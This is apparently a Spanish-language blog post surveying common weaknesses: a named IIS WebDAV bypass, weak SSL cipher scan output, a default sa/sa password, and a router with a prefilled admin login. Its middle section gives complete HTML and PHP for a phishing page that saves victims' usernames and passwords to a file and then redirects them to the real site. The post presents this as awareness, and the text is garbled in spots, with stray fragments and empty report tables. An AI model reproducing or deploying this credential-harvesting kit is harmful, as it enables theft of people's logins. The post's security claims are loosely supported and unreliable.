*NOTA:cuando me refiero a
Linksys
*NOTA:cuando me refiero a
Decryptum
WebDAV Permitido
Aqui les dejo como explotar la vulnerabilidad. Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)
SSL Débil De Cifra
| Server |
| Details |
| Weak SSL ciphers (SSL2 on port 443):
|
| Server |
| Details |
| Weak SSL ciphers (SSL3 on port 443):
|
| Server |
| Details |
| Weak SSL ciphers (TLS1 on port 443):
|
Esto es una vista de como aparece elreporte hacerca de esto. Recuerden no todo lo que brilla es oro asi que debemos cuidarnos de portales que reclamen tener gran seguridad que en realidad no ofrecen.
Contraseña Débil
Asi se ve el reporte:
Username: sa, Password: sa
Esto nos enseña que deberiamos usar contraseñas mas fuertes y que no sean iguales al nombre de usuario.
Pescando
<p><label for="username">Email:</label>
<input name="username" type="text" id="username" size="20" /></p>
y para contraseña:
<p><label for="password">Password:</label>
<input name="password" id="password" size="20" type="password"></p>
Luego se crea un archivo .php con la siguiente informacion:
<?php
$name = $_POST["username"];
$pass = $_POST["password"];
$fl = fopen('POST.html', 'a');
fwrite($fl, "" .$name. ":" .$pass. "<BR><BR>");
fclose($fl);
header( 'Location: http://www.pagina a redirigir.com' ) ;
?>
En donde pagina a redirigir seria la pagina a la que despues de que el usuario a introducido su contraseña en el portal falso lo redirigira al portal en la red autentico. Guardamos el archivo con el nombre: archivo.php Despues de haber creado y editado los dos archivos vamos al archivo .html y escribimos el nombre que le dimos al archivo .php:
<form action="archivo.php" method="post">
Donde archivo.php es el archivo .php donde se llevara el nombre de usuario y la contraseña a POST.html.
Este es basicamente el modo en el que se crea una pagina para "pescar" a la gente. Para salvarnos de una de ellas siempre verifiquemos el URL y si la conexion esta siendo llevada acabo por SSL o https.
Desenredar
Hace algunos dias estaba navegando por una red y se me ocurrio entrar en su ruteador. Tecle 192.168.1.2. Encontre que en los espacios para llenar el nombre de usuario y la contraseña. Yo pensaba en empesar a adivinar el nobre de usuario y la contraseña, pero para mi sorpresa el nombre de usuario admin ya estaba escrito. Sistemas de codigo abierto como Untangle son muy inseguros. Incluso tiene un buen filtro de busqueda para niños o empleados vagos, pero este puede ser burlado por cierta persona clasica que le haga una jaqueca y adivine el password. El filtro y toda la informacion qur viaja atravez del ruteador puede ser comprometida por esta cierta persona. Hay que tener cuidado con que herramientas se trabaja en ruteadores publicos o privados ya que este, tu red e incluso tu computadora pueden ser explotados por cierta persona.